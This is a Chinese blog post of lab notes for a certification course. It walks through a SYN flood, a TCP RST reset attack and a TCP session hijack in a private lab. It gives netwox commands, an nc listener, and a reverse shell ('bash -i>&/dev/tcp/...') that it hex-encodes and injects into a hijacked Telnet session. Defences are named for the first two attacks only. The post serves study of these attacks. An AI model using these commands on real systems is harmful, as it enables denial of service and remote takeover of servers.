HCIE(3)——TCP DOS攻击模拟

最新推荐文章于 2023-09-06 16:13:06 发布
最新推荐文章于 2023-09-06 16:13:06 发布
阅读量982 收藏 4
点赞数 1
分类专栏: 网络实验
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45782298/article/details/109204259
版权

一、TCP半开攻击

1)攻击原理
攻击方只需要发送大量的syn分节给服务器,然后对服务器返回的syn+ack什么也不做,直接忽略掉。
不发送ack给服务器,这样就可以一直占着服务器半连接对列的资源,导致正常的客户端无法连接上服务器。
syn flood的攻击方式主要有两种:
第一种是,攻击方的客户端一直发送syn,对于服务端回复的syn+ack什么也不做,直接忽略掉。
第二种是,攻击方的客户端发送syn时,将源IP改为一个虚假的IP,然后服务器会将syn+ack发送到虚假IP上去,这样客户端也不需要回复ack。
2)半开攻击实验模拟
①环境准备:

服务端:172.24.8.134
客户端:172.24.8.253
攻击者:172.24.8.129

②在服务端首先将**/proc/sys/net/ipv4/net.ipv4.tcp_syncookies**的值设为0,关闭防御机制,增强实验效果。
③使用netwox的76号工具进行攻击
攻击前使用客户端连接服务端(在服务端搭建了一个http服务器用来测试)
在这里插入图片描述
发现可以成功访问

使用netwox 76 号工具进行攻击

sudo netwox 76 -i 172.24.8.134 -p 80

再次进行测试:
在这里插入图片描述
发现已经不能成功建立连接了
3)防御措施
建立cookies机制。
cookies机制就是只为已经成功建立了TCP连接的主机,继续分配连接资源。像那种发出大量syn的连接,但不回复ack的连接,不予受理。后面的连接是建立在前面的连接三次握手已经完成的基础上的。
做法:将/etc/sysctl.conf中的net.ipv4_syscookies值设为1(默认情况下就是1)。
cookies的建立是利用了hash算法提取TCP头部的一写字段来做标记,相当于建立了一个名单。

二、TCP RST重置攻击

1)攻击原理
RST:就算是reset的意思,重置就是指受害者收到的TCP包中携带RST字段,不论当前处于什么状态,都会将当前的连接释放掉。
举例来说,就是A和服务器B建立的TCP连接,如果此时的攻击者C伪造了一个TCP RST的包发给B,就会使B异常的断开与A的连接,这就是RST攻击。
伪造带RST位的TCP包会有什么后果:
①假定攻击者C伪装A发过去的包,这个包里面的RST置位,缓冲器上所有数据,B都会丢弃,并强制关闭所有连接。
②如果C伪装成A发过去的包是syn包,那么B会表示A已经是正常的连接了却又来建立新的连接,默认是不安全,B会主动向A 发送一个RST包,并在自己这端强制关闭连接。
2)开始攻击
①环境准备:

服务端:172.24.8.134
客户端:172.24.8.253
攻击者:172.24.8.129

②使用netwox的78号工具进行攻击
攻击前使用客户端远程连接Telnet服务端
在这里插入图片描述
开始攻击:

sudo netwox 78 -i "172.24.8.134" -f "port 80"

在这里插入图片描述
可以看到,再次查看的时候,发现已经断开了连接了。
3)防御手段
简单粗暴的一个可行方法:通过防火墙进行简单设置,建议使用防火墙将进来的带RST位的包丢弃。

三、TCP劫持及反弹shell攻击

1)TCP劫持攻击原理
在这里插入图片描述
1、hacker获取client与server的TCP会话包(通常通过ARP毒化、MAC地址洪泛等方法)
2、观察server发送给client的TCP报文,以获取client将要发送给server的下一个报文信息。
需要将里面显示的序列号显示为真正的序列号。
在这里插入图片描述
3、hacker利用工具伪造一个TCP报文,发送给server,其内容信息通过步骤2获得的报文信息来确定。
大致需要的报文信息有:
二层的src-MAC是hacker的地址
三层的src-IP是client的IP,des-IP是server的IP)四层的参数则是通过步骤2获取。
2)反弹shell原理
可以使用kali和客户端来实现:
kali上先利用需要监听的端口,这里我们监听9999端口

sudo nc -l -p 9999 -v

将反弹shell转换为16进制

bash -i>&/dev/tcp/172.24.8.129/9999 0>&1
//这是一个简单的shell脚本

我们使用HEX编码器将这个shell脚本转换为16进制编码(切记:在编码结束后面要加上回车键的16进制0d00,表示执行的意思)

62617368202D693E262F6465762F7463702F3137322E32342E382E3132392F3939393920303E26310d00

观看效果:使用ls可以进行一下测试
在这里插入图片描述
2)实验模拟
①实验环境准备

服务端:172.24.8.128
客户端:172.24.8.253
攻击者:172.24.8.129

提前打开wireshark抓包工具。
②先使用客户端远程Telnet服务端,并且攻击者kali开启反弹shell功能。
在这里插入图片描述
在这里插入图片描述
③攻击者使用wireshark抓包工具并分析报文
在这里插入图片描述
④使用netwox的40号工具进行TCP的劫持(里面内容是根据步骤③报文分析而得)

sudo netwox 40 --ip4-ttl 128 --ip4-protocol 6 --ip4-src 172.24.8.253 --ip4-dst 172.24.8.128 --tcp-src 1077  --tcp-dst 23 --tcp-seqnum 263448091 --tcp-acknum 780472132 --tcp-ack --tcp-psh --tcp-window 227 --tcp-data 62617368202D693E262F6465762F7463702F3137322E32342E382E3132392F3939393920303E26310d00

在这里插入图片描述
测试结果:
在这里插入图片描述
可以看到攻击者已经成功远程到了服务器上。

come better
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DOS攻防
赤赤三的博客
03-24 3101
DOS攻防 拒绝服务 原理: 利用程序漏洞或一对一资源耗尽的Denial Service拒绝服务,一对一的攻击完全拼的是各自的资源,效果差(DOS攻击) DDOS分布式拒绝服务(多对一的攻击汇聚资源能力,重点在于量大,属于资源耗尽型) 分类: Dos网络:基于巨量的Flood耗尽目标网络带宽资源:ICMP Flood,UDP FLood Dos协议:攻击协议漏洞发起的拒绝服务攻击:Syn Flood、Ping of Death、ARP、DNS、SSL Dos应用:
模拟网络攻击_ICMP/TCP攻击_大数据包攻击_泛洪攻击
guansheng123的博客
02-23 3840
模拟网络攻击_ICMP/TCP攻击_大数据包攻击_泛洪攻击
模拟DOSS攻击
Samurai77的博客
07-15 1662
分布式拒绝服务(DDoS:Distributed Denial of Service)攻击指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,从而成倍地提高拒绝服务攻击的威力。通常,攻击者使用一个偷窃帐号将DDoS主控程序安装在一个计算机上,在一个设定的时间主控程序将与大量代理程序通讯,代理程序已经被安装在网络上的许多计算机上。代理程序收到指令时就发动攻击...
DoS攻击
ss810540895的博客
09-19 5739
原文DoS攻击(Denial of Service,拒绝服务攻击)通过消耗计算机的某种资源,例如计算资源、网络连接等,造成资源耗尽,导致服务端无法为合法用户提供服务或只能提供降级服务。在SDN网络的集中式架构中,控制器是天然的网络中心,负责整个网络的管理和控制工作,很容易成为DoS攻击的目标。在OpenFlow网络架构中,控制器是网络的核心,承担了整个网络的控制管理工作;控制器需要对整个网络进行不同粒度的管理,网络本身的数据传输需求会对控制层面造成不小的压力;尤其当存在恶意攻击时,控制层面甚至可能无法对合法
Dos攻击简单体验
m0_51786204的博客
05-07 1892
1. 理解常见拒绝服务攻击基本原理; 2.在kali中使用hping3工具针对目标发送大量的TCP SYN连接,实现对目标的拒绝服务攻击。
模拟解决DOS攻击的shell脚本
weixin_30500473的博客
08-15 262
方法1: #!/bin/sh While true do awk ‘{print $1}’.access.log|grep –v “^$”|sort|uniq –c >/tmp/access.log #netstat –an|grep EST|awk –F ‘[ :]+’ ‘{print $6}’|sort|uniq –c >/tmp/ac...
hcie——rs复习
12-09
想要学习HCIE的可以学习,本资料是HCIE的全部资料,包括HCNA到HCIE的全部知识点
HCIE-RS H12-261模拟.pdf
最新发布
04-16
HCIE-RS H12-261模拟.pdf
HCIE-R&S实验模拟试卷1答案.7z
09-27
HCIE-R&S实验模拟试卷1答案,里面包含答案和拓扑。还有答案
HCIE面试题——LAN&WAN 技术.docx
12-18
HCIE 面试题——LAN&WAN 技术 HCIE 面试题——LAN&WAN 技术是一份关于 LAN&WAN 技术的面试题,涵盖了交换机端口类型、VLAN 帧的识别、数据帧的处理方式等多个方面的知识点。 交换机端口类型 交换机端口类型有四种...
模拟工具集合内含DOS 。 WINDOWS GHOST BIOS WINDOWS安装
07-16
内含DOS 。 WINDOWS GHOST BIOS WINDOWS安装 注册表模拟
HCIE-RS_中文模拟题.docx
12-24
HCIE-RS_中文模拟
DOS攻击实验
qq_20381661的专栏
04-12 3798
一、实验内容 (一)死亡之ping 1.在Win2003主机(10.10.10.130)上对WinXP主机(192.168.10.128)进行死亡之ping。 使用命令为:ping -l 65500 192.168.10.128 -t,抓包结果如下: (二)利用hping3实现DOS攻击 1.在kali主机上对WinXP主机(192.168.10.128)进行洪泛攻击,使用命令为:hping3 -S 192.168.10.128 -a 10.10.10.128 -p 22 –flood,使..
简单的DOS攻击
热门推荐
qq_43688708的博客
03-02 1万+
实现简单的DOS攻击,主要介绍了由python编写的hammer脚本和Hping3工具
DOS攻击实验——让我知道了是我低估的这个小服务器
qq_42249402的博客
06-13 929
不知道在哪里浏览到关于LOIC的,但该实验绝对是用于学习,而非刻意的用于攻击。 首先实验攻击的对象是一个小型的本地FTP服务器(Quick Easy FTP Server)其次便是本次的主角LOIC了。我使用的主机是win7的,在运行本次主角时有提示要安装.NET Framework,也不知道为什么。但好像必须,所以就乖乖的去下载安装了。 服务器配置比较简单: 攻击测试: 输入好地址、端口号、协议等点击【IMMA CHARGIN MAHL AZER 】按钮就开始了。在服务器配置中可以查看服务器的日志在飞速的
chatgpt赋能python:Python如何进行DOS攻击
b45e1933f46的博客
06-09 398
DOS攻击(Denial of Service,拒绝服务攻击)指的是发送大量请求,使目标服务器超载,无法正常处理正常请求。攻击者通常会使用大量的计算机向目标服务器发送请求,以达到耗尽服务器资源的目的。这样就会导致服务器无法响应正常的请求,甚至崩溃,给业务带来严重的影响。DOS攻击通常被广泛应用于网络安全领域的渗透测试和攻击,也被黑客以非法手段用于网络攻击和勒索软件的发布。所以,DOS攻击不仅给企业造成了巨大的经济损失,也对行业的稳定和信心造成威胁。本文由chatgpt生成,文章没有在chatgpt。
kali系统进行DoS攻击教程(虚拟机单人可玩)
2301_77296801的博客
09-06 1210
DoS攻击是指恶意的攻击网络协议实现的缺陷或直接通过野蛮手段残忍地耗尽被攻击对象的资源,目的是让目标计算机或网络无法提供正常的服务或资源访问,使目标系统服务系统停止响应甚至崩溃,而在此攻击中并不包括侵入目标服务器或目标网络设备。第三次握手:客户端收到服务器的SYN十ACK包,向服务器发送确认包ACK(ACK=j+1),此包发送完毕,客户端和服务器进入ESTABLISHED状态,完成三次握手,客户端与服务器开始传送数据。点击编辑-->虚拟网络编辑器-->添加网络-->vmnet 4-->修改。
HCIE(3)——TCPDOS攻击
qq_45782298的博客
10-21 1064
一、了解TCP三次握手过程 要想了解有关于TCPDOS攻击,就需要首先理解TCP的三次握手过程。 1、TCP的三次握手过程如图: 第一次握手: 客户端主动去connect服务器,并且发送syn,假设序列号为J 服务器时 被动打开的。 第二次握手: 服务器在收到syn后,它会发送一个syn以及一个ack应答给客户端,ack的序列号为J+1,表示是给syn J的应答 新发送的syn序列号为K 第三次握手: 客户端在收到新的syn K和ack J+1后,也向服务端回应一个ack K+1表示收到了,然后两边就可
h3c配置HCIE RIP
09-14
要配置HCIE RIP,可以按照以下步骤进行操作: 1. 首先,进入路由器的全局配置模式。可以使用以下命令: ``` system-view ``` 2. 然后,创建一个 RIP 进程并进入 RIP 配置模式。可以使用以下命令: ``` rip ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值